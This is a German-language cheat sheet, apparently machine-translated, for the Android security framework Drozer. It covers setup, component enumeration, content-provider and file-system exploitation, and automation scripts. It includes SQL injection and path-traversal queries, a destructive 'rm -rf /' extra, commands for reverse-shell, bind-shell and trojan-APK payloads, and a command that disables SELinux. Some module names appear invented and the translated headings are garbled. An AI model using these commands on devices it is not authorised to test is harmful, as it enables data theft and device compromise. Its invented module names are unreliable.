Drozer Cheat Sheet

📋 Kopieren Sie alle Befehle 📄 PDF generieren

Überblick

Drozer ist ein umfassendes Sicherheitstest-Framework für Android-Anwendungen. Es ermöglicht Ihnen, die Rolle einer Android-App zu übernehmen und mit dem Dalvik VM, den IPC-Endpunkten anderer Apps und dem darunter liegenden Betriebssystem zu interagieren. Drozer bietet Tools zur Fernausbeutung von Android-Geräten durch bösartige Anwendungen und umfassende Sicherheitsbewertung von Android-Anwendungen.

ZEIT Warning: Verwenden Sie Drozer nur auf Geräten und Anwendungen, die Sie besitzen oder eine ausdrückliche Erlaubnis zum Testen haben. Unberechtigte Nutzung kann gegen Nutzungsbedingungen oder lokale Gesetze verstoßen.

Installation

Voraussetzungen

```bash

Install Java Development Kit

sudo apt update sudo apt install openjdk-11-jdk

Install Python 2.7 (required for Drozer)

sudo apt install python2.7 python2.7-dev python-pip

Install Android SDK and ADB

sudo apt install android-tools-adb android-tools-fastboot

Set JAVA_HOME environment variable

export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64 echo 'export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64' >> ~/.bashrc ```_

Linux Installation

```bash

Download Drozer

wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk

Install Drozer

pip2 install drozer-2.4.4-py2-none-any.whl

Alternative: Install from source

git clone https://github.com/FSecureLABS/drozer.git cd drozer python2 setup.py install ```_

macOS Installation

```bash

Install Homebrew (if not already installed)

/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

Install Python 2.7

brew install python@2

Install Drozer

pip2 install drozer

Download Drozer agent APK

wget https://github.com/FSecureLABS/drozer/releases/download/2.4.4/drozer-agent-2.4.4.apk ```_

Windows Installation

```bash

Install Python 2.7 from python.org

Download and install from: https://www.python.org/downloads/release/python-2718/

Install Drozer using pip

pip install drozer

Download Drozer agent APK

Download from: https://github.com/FSecureLABS/drozer/releases/

```_

Android Device Setup

```bash

Enable USB debugging on Android device

Settings > Developer Options > USB Debugging

Install Drozer agent on device

adb install drozer-agent-2.4.4.apk

Start Drozer agent on device

Open Drozer Agent app and toggle "Embedded Server" ON

Forward port for communication

adb forward tcp:31415 tcp:31415 ```_

Basisnutzung

Verbindung mit Gerät

```bash

Connect to Drozer agent

drozer console connect

Connect with specific endpoint

drozer console connect --server 192.168.1.100:31415

List available devices

drozer console devices

Connect to specific device

drozer console connect --device ```_

Grundlegende Befehle

```bash

List available modules

dz> list

Get help for specific module

dz> help app.package.list

List installed packages

dz> run app.package.list

Get package information

dz> run app.package.info -a com.example.app

List activities

dz> run app.activity.info -a com.example.app

List services

dz> run app.service.info -a com.example.app

List broadcast receivers

dz> run app.broadcast.info -a com.example.app ```_

Paketanalyse

Angebotsinformationen

```bash

List all packages

dz> run app.package.list

List packages with filter

dz> run app.package.list -f keyword

Get detailed package information

dz> run app.package.info -a com.example.app

List package permissions

dz> run app.package.info -a com.example.app -p

Find packages with specific permission

dz> run app.package.list -p android.permission.INTERNET

List system packages

dz> run app.package.list -f system

List third-party packages

dz> run app.package.list -3 ```_

Anwendungskomponenten

```bash

List activities

dz> run app.activity.info -a com.example.app

List exported activities

dz> run app.activity.info -a com.example.app -e

List services

dz> run app.service.info -a com.example.app

List exported services

dz> run app.service.info -a com.example.app -e

List broadcast receivers

dz> run app.broadcast.info -a com.example.app

List exported broadcast receivers

dz> run app.broadcast.info -a com.example.app -e

List content providers

dz> run app.provider.info -a com.example.app

List exported content providers

dz> run app.provider.info -a com.example.app -e ```_

Aktivitätstests

Aktivitätszählung

```bash

Find activities in package

dz> run app.activity.info -a com.example.app

Find exported activities

dz> run app.activity.info -a com.example.app -e

Find activities with intent filters

dz> run app.activity.info -a com.example.app -i

Search for activities by permission

dz> run app.activity.info -p android.permission.CAMERA ```_

Aktivitäten Exploitation

```bash

Start activity

dz> run app.activity.start --component com.example.app com.example.MainActivity

Start activity with extras

dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string username admin --extra string password secret

Start activity with intent data

dz> run app.activity.start --component com.example.app com.example.MainActivity --data-uri content://com.example.provider/data

Start activity with specific action

dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://malicious.com

Test for intent injection

dz> run app.activity.start --component com.example.app com.example.MainActivity --extra string debug true ```_

Service Testing

Service Enumeration

```bash

List services in package

dz> run app.service.info -a com.example.app

List exported services

dz> run app.service.info -a com.example.app -e

Find services with specific permissions

dz> run app.service.info -p android.permission.BIND_DEVICE_ADMIN ```_

Service Exploitation

```bash

Start service

dz> run app.service.start --component com.example.app com.example.BackgroundService

Start service with extras

dz> run app.service.start --component com.example.app com.example.BackgroundService --extra string command "rm -rf /"

Send intent to service

dz> run app.service.send com.example.app com.example.BackgroundService --extra string action "backup_data"

Test service binding

dz> run app.service.bind com.example.app com.example.BackgroundService ```_

Content Provider Testing

Inhaltsanbieter Aufzählung

```bash

List content providers

dz> run app.provider.info -a com.example.app

List exported content providers

dz> run app.provider.info -a com.example.app -e

Find URIs for content provider

dz> run app.provider.finduri com.example.provider

Scan for accessible content URIs

dz> run scanner.provider.finduris -a com.example.app ```_

Content Provider Exploitation

```bash

Query content provider

dz> run app.provider.query content://com.example.provider/users

Query with selection

dz> run app.provider.query content://com.example.provider/users --selection "username=?" --selection-args admin

Insert data into content provider

dz> run app.provider.insert content://com.example.provider/users --string username hacker --string password secret

Update data in content provider

dz> run app.provider.update content://com.example.provider/users --selection "id=1" --string password newpassword

Delete data from content provider

dz> run app.provider.delete content://com.example.provider/users --selection "username=admin"

Test for SQL injection

dz> run app.provider.query content://com.example.provider/users --selection "username='admin' OR '1'='1'"

Read files via content provider

dz> run app.provider.read content://com.example.provider/files/../../etc/hosts

Download files

dz> run app.provider.download content://com.example.provider/files/secret.txt /tmp/secret.txt ```_

Broadcast Receiver Test

Broadcast Receiver Enumeration

```bash

List broadcast receivers

dz> run app.broadcast.info -a com.example.app

List exported broadcast receivers

dz> run app.broadcast.info -a com.example.app -e

Find receivers for specific intent

dz> run app.broadcast.info -i android.intent.action.BOOT_COMPLETED ```_

Rundfunkempfänger Exploitation

```bash

Send broadcast intent

dz> run app.broadcast.send --action com.example.CUSTOM_ACTION

Send broadcast with extras

dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string command "reboot"

Send system broadcasts

dz> run app.broadcast.send --action android.intent.action.BOOT_COMPLETED

Send ordered broadcast

dz> run app.broadcast.send --action com.example.CUSTOM_ACTION --extra string priority high

Test for broadcast injection

dz> run app.broadcast.send --action com.example.ADMIN_ACTION --extra boolean admin_mode true ```_

Dateisystemanalyse

Dateisystem Aufzählung

```bash

List application files

dz> run tools.file.list /data/data/com.example.app/

Find readable files

dz> run tools.file.readable /data/data/com.example.app/

Find writable files

dz> run tools.file.writable /data/data/com.example.app/

Search for files with specific patterns

dz> run tools.file.find /data/data/com.example.app/ "*.db"

Find world-readable files

dz> run tools.file.permissions /data/data/com.example.app/ ```_

Dateisystem Exploitation

```bash

Read file contents

dz> run tools.file.read /data/data/com.example.app/shared_prefs/config.xml

Download file

dz> run tools.file.download /data/data/com.example.app/databases/app.db /tmp/app.db

Upload file

dz> run tools.file.upload /tmp/malicious.so /data/data/com.example.app/lib/malicious.so

Create symbolic link

dz> run tools.file.symlink /data/data/com.example.app/secret.txt /sdcard/exposed_secret.txt

Change file permissions

dz> run tools.file.chmod 777 /data/data/com.example.app/config.txt ```_

Datenbankanalyse

SQLite Datenbank Testing

```bash

Find SQLite databases

dz> run tools.file.find /data/data/com.example.app/ "*.db"

Connect to SQLite database

dz> run tools.sqlite.connect /data/data/com.example.app/databases/app.db

List tables in database

dz> run tools.sqlite.tables /data/data/com.example.app/databases/app.db

Query database

dz> run tools.sqlite.query /data/data/com.example.app/databases/app.db "SELECT * FROM users"

Test for SQL injection in content providers

dz> run app.provider.query content://com.example.provider/users --selection "username='; DROP TABLE users; --"

Dump database schema

dz> run tools.sqlite.schema /data/data/com.example.app/databases/app.db

Export database

dz> run tools.sqlite.dump /data/data/com.example.app/databases/app.db > /tmp/database_dump.sql ```_

Netzwerkanalyse

Netzwerkkonfiguration

```bash

Check network security config

dz> run tools.file.read /data/data/com.example.app/res/xml/network_security_config.xml

List network interfaces

dz> run tools.setup.network

Check for cleartext traffic

dz> run scanner.misc.checknetworksecurityconfig -a com.example.app

Test for certificate pinning bypass

dz> run scanner.misc.checkpinning -a com.example.app ```_

SSL/TLS Testing

```bash

Test SSL certificate validation

dz> run scanner.misc.native -a com.example.app

Check for weak SSL implementations

dz> run scanner.misc.checkssl -a com.example.app

Test for certificate transparency

dz> run scanner.misc.checkcertificatetransparency -a com.example.app ```_

Erweiterte Nutzung

Personalentwicklung

```python

Create custom Drozer module

File: ~/.drozer_modules/custom/exploit.py

from drozer.modules import common, Module

class CustomExploit(Module, common.FileSystem, common.PackageManager): name = "Custom Exploit Module" description = "Custom exploitation module" examples = "run custom.exploit -a com.example.app" author = "Security Researcher" date = "2024-01-01" license = "BSD (3 clause)" path = ["custom"]

def add_arguments(self, parser):
    parser.add_argument("-a", "--package", help="target package")

def execute(self, arguments):
    if arguments.package:
        self.stdout.write("Exploiting package: %s\n" % arguments.package)
        # Custom exploitation logic here
    else:
        self.stdout.write("Please specify target package\n")

```_

Nutzlasterzeugung

```bash

Generate malicious APK

dz> run payload.apk.create --output /tmp/malicious.apk

Generate reverse shell payload

dz> run payload.reverse.shell --lhost 192.168.1.100 --lport 4444

Generate bind shell payload

dz> run payload.bind.shell --port 4444

Embed payload in legitimate APK

dz> run payload.apk.embed --original /tmp/legitimate.apk --payload /tmp/payload.apk --output /tmp/trojan.apk ```_

Vorrechte Eskalation

```bash

Check for root access

dz> run tools.setup.busybox

Exploit setuid binaries

dz> run exploit.setuid.find

Test for kernel exploits

dz> run exploit.kernel.check

Exploit application vulnerabilities

dz> run exploit.app.privilege -a com.example.app

Test for directory traversal

dz> run exploit.traversal.test -a com.example.app ```_

Automatisierungsskripte

Umfassendes Beurteilungsskript

```python

!/usr/bin/env python2

import subprocess import json import sys

class DrozerAutomation: def init(self, package_name): self.package = package_name self.results = \\{\\}

def run_drozer_command(self, command):
    """Execute Drozer command and return output"""
    try:
        cmd = ["drozer", "console", "connect", "-c", command]
        output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
        return output.decode('utf-8')
    except subprocess.CalledProcessError as e:
        return f"Error: \\\\{e.output.decode('utf-8')\\\\}"

def analyze_package(self):
    """Perform comprehensive package analysis"""
    print(f"[+] Analyzing package: \\\\{self.package\\\\}")

    # Package information
    self.results['package_info'] = self.run_drozer_command(
        f"run app.package.info -a \\\\{self.package\\\\}"
    )

    # Activities
    self.results['activities'] = self.run_drozer_command(
        f"run app.activity.info -a \\\\{self.package\\\\}"
    )

    # Services
    self.results['services'] = self.run_drozer_command(
        f"run app.service.info -a \\\\{self.package\\\\}"
    )

    # Content Providers
    self.results['providers'] = self.run_drozer_command(
        f"run app.provider.info -a \\\\{self.package\\\\}"
    )

    # Broadcast Receivers
    self.results['receivers'] = self.run_drozer_command(
        f"run app.broadcast.info -a \\\\{self.package\\\\}"
    )

    return self.results

def test_exported_components(self):
    """Test exported components for vulnerabilities"""
    print("[+] Testing exported components")

    # Test exported activities
    exported_activities = self.run_drozer_command(
        f"run app.activity.info -a \\\\{self.package\\\\} -e"
    )

    # Test exported services
    exported_services = self.run_drozer_command(
        f"run app.service.info -a \\\\{self.package\\\\} -e"
    )

    # Test exported providers
    exported_providers = self.run_drozer_command(
        f"run app.provider.info -a \\\\{self.package\\\\} -e"
    )

    return \\\\{
        'exported_activities': exported_activities,
        'exported_services': exported_services,
        'exported_providers': exported_providers
    \\\\}

def test_content_providers(self):
    """Test content providers for vulnerabilities"""
    print("[+] Testing content providers")

    # Find URIs
    uris = self.run_drozer_command(
        f"run app.provider.finduri \\\\{self.package\\\\}"
    )

    # Scan for accessible URIs
    accessible_uris = self.run_drozer_command(
        f"run scanner.provider.finduris -a \\\\{self.package\\\\}"
    )

    return \\\\{
        'uris': uris,
        'accessible_uris': accessible_uris
    \\\\}

def generate_report(self):
    """Generate comprehensive security report"""
    report = \\\\{
        'package': self.package,
        'analysis_results': self.results,
        'exported_components': self.test_exported_components(),
        'content_provider_tests': self.test_content_providers()
    \\\\}

    with open(f"\\\\{self.package\\\\}_security_report.json", 'w') as f:
        json.dump(report, f, indent=2)

    print(f"[+] Report saved: \\\\{self.package\\\\}_security_report.json")
    return report

Usage

if name == "main": if len(sys.argv) != 2: print("Usage: python2 drozer_automation.py ") sys.exit(1)

package_name = sys.argv[1]
analyzer = DrozerAutomation(package_name)
analyzer.analyze_package()
analyzer.generate_report()

```_

Batch Testing Script

```bash

!/bin/bash

Batch testing script for multiple packages

PACKAGES_FILE="packages.txt" RESULTS_DIR="drozer_results"

mkdir -p $RESULTS_DIR

while IFS= read -r package; do echo "[+] Testing package: $package"

# Create package-specific directory
mkdir -p "$RESULTS_DIR/$package"

# Run comprehensive tests
drozer console connect -c "run app.package.info -a $package" > "$RESULTS_DIR/$package/package_info.txt"
drozer console connect -c "run app.activity.info -a $package -e" > "$RESULTS_DIR/$package/exported_activities.txt"
drozer console connect -c "run app.service.info -a $package -e" > "$RESULTS_DIR/$package/exported_services.txt"
drozer console connect -c "run app.provider.info -a $package -e" > "$RESULTS_DIR/$package/exported_providers.txt"
drozer console connect -c "run app.broadcast.info -a $package -e" > "$RESULTS_DIR/$package/exported_receivers.txt"

# Test content providers
drozer console connect -c "run scanner.provider.finduris -a $package" > "$RESULTS_DIR/$package/provider_uris.txt"

# Test for common vulnerabilities
drozer console connect -c "run scanner.provider.injection -a $package" > "$RESULTS_DIR/$package/sql_injection.txt"
drozer console connect -c "run scanner.provider.traversal -a $package" > "$RESULTS_DIR/$package/path_traversal.txt"

echo "[+] Results saved to $RESULTS_DIR/$package/"

done < "$PACKAGES_FILE"

echo "[+] Batch testing completed" ```_

Fehlerbehebung

Verbindungsprobleme

```bash

Check if Drozer agent is running

adb shell am start -n com.mwr.dz/.activities.MainActivity

Verify port forwarding

adb forward --list adb forward tcp:31415 tcp:31415

Restart ADB server

adb kill-server adb start-server

Check device connectivity

adb devices

Test connection manually

telnet localhost 31415 ```_

Aufgaben

```bash

Reinstall Drozer agent

adb uninstall com.mwr.dz adb install drozer-agent-2.4.4.apk

Check agent permissions

adb shell dumpsys package com.mwr.dz

Enable agent in device settings

Settings > Apps > Drozer Agent > Permissions

Check if agent service is running

adb shell ps|grep drozer ```_

Modulfragen

```bash

Refresh module list

dz> reload

Check module path

dz> list

Install custom modules

mkdir -p ~/.drozer_modules cp custom_module.py ~/.drozer_modules/

Debug module loading

dz> help custom.module ```_

Genehmigungsfragen

```bash

Check required permissions

adb shell dumpsys package com.example.app|grep permission

Grant permissions manually

adb shell pm grant com.example.app android.permission.READ_EXTERNAL_STORAGE

Check SELinux status

adb shell getenforce

Disable SELinux (if rooted)

adb shell su -c "setenforce 0" ```_

Leistungsfragen

```bash

Increase timeout values

dz> set timeout 30

Reduce output verbosity

dz> set verbose false

Clear cache

rm -rf ~/.drozer/cache/

Use specific device

drozer console connect --device ```_

Ressourcen

• offizielle Drozer-Dokumentation
• Drozer GitHub Repository
• [Drozer User Guide](LINK_7 -%20Android%20Security%20Testing%20with%20Drozer
• [OWASP Mobile Security Testing Guide](LINK_7
• [Android Application Security](LINK_7
• [Drozer Modulentwicklung](LINK_7

--

*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von Drozer für Android-Anwendung Sicherheitstests. Stellen Sie immer sicher, dass Sie eine richtige Berechtigung haben, bevor Sie alle Android-Anwendungen oder Geräte testen. *